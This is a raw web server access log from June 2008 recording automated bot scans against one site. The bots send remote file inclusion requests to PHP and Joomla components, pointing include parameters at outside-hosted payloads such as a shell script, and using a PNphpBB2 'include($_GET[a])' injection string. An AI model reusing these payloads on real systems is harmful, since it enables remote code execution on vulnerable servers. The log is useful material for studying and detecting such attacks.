211.234.98.104 - - [24/Jun/2008:12:42:25 -0700] "GET /logs/access_080112.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:42:28 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:42:29 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:42:29 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:42:33 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.101.68 - - [24/Jun/2008:12:42:33 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.69.127.188 - - [24/Jun/2008:12:42:44 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:42:55 -0700] "GET /logs/access_080321.log//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:42:56 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:42:56 -0700] "GET /logs//components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:42:58 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.123.104.159 - - [24/Jun/2008:12:42:58 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.53.78.212 - - [24/Jun/2008:12:43:17 -0700] "GET //components/com_sef/sef.class.php?mosConfig_absolute_path=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:28 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:43:31 -0700] "GET /logs////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:43:31 -0700] "GET /logs/access_080108.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:43:31 -0700] "GET ////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
61.100.7.111 - - [24/Jun/2008:12:43:38 -0700] "GET /logs/access_080112.log////tools/send_reminders.php?noSet=0&includedir= HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:12:43:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:47 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:48 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:12:43:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:44:28 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:44:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:12:44:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:45:02 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:45:07 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.83.67.217 - - [24/Jun/2008:12:45:10 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:17 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:17 -0700] "GET //modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:17 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:22 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:22 -0700] "GET //modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:45:22 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.54.43.84 - - [24/Jun/2008:12:45:26 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [24/Jun/2008:12:45:26 -0700] "GET //modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.54.43.84 - - [24/Jun/2008:12:45:26 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:12:45:39 -0700] "GET /logs//facileforms.frame.php?ff_compath=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:12:45:39 -0700] "GET //facileforms.frame.php?ff_compath=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:12:45:52 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:12:45:52 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [24/Jun/2008:12:45:53 -0700] "GET /index.php?url=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18419 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:12:46:01 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [24/Jun/2008:12:46:02 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ffmundomaya.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:46:07 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [24/Jun/2008:12:46:08 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:46:09 -0700] "GET /logs/access_080120.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.54.43.84 - - [24/Jun/2008:12:46:17 -0700] "GET /logs/access_080204.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.30.73.117 - - [24/Jun/2008:12:46:20 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.gg2003.de/phpBB2//language/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:46:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.40.163.165 - - [24/Jun/2008:12:46:22 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.135.118 - - [24/Jun/2008:12:46:32 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [24/Jun/2008:12:46:34 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.135.118 - - [24/Jun/2008:12:46:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.107.121.154 - - [24/Jun/2008:12:46:44 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:12:46:50 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:46:50 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:46:50 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:46:50 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:12:46:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
78.31.70.251 - - [24/Jun/2008:12:46:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.57.137.51 - - [24/Jun/2008:12:47:04 -0700] "GET /logs/access_080304.log//index.php?_REQUEST=&_REQUEST%1boption%1d=com_rss&_REQUEST%1bItemid%1d=1&GLOBALS=&mosConfig_absolute_path=http://auctionsbymaggie.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:47:08 -0700] "GET /logs/access_080120.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.246.6.245 - - [24/Jun/2008:12:47:08 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.246.6.245 - - [24/Jun/2008:12:47:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:47:16 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.245.12.66 - - [24/Jun/2008:12:47:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://riyands.qupis.com/bot/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.218.234.146 - - [24/Jun/2008:12:47:22 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [24/Jun/2008:12:47:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [24/Jun/2008:12:47:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sbc.sytu.edu.cn/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.16.91.22 - - [24/Jun/2008:12:47:32 -0700] "GET /logs/access_080112.log//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [24/Jun/2008:12:47:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [24/Jun/2008:12:47:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.246.67.133 - - [24/Jun/2008:12:47:36 -0700] "GET /logs/access_071225.log HTTP/1.1" 200 195051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:47:38 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:47:40 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:47:41 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:48:07 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:48:10 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.24 - - [24/Jun/2008:12:48:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:48:37 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:48:37 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:48:37 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:12:49:04 -0700] "GET /logs/access_080215.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:49:41 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:49:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.186.129 - - [24/Jun/2008:12:49:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.212.200.190 - - [24/Jun/2008:12:49:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.200.189 - - [24/Jun/2008:12:49:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.24.222 - - [24/Jun/2008:12:49:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.67.24.222 - - [24/Jun/2008:12:49:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
88.212.200.190 - - [24/Jun/2008:12:50:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.200.190 - - [24/Jun/2008:12:50:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.200.189 - - [24/Jun/2008:12:50:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.200.189 - - [24/Jun/2008:12:50:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.212.200.189 - - [24/Jun/2008:12:50:02 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
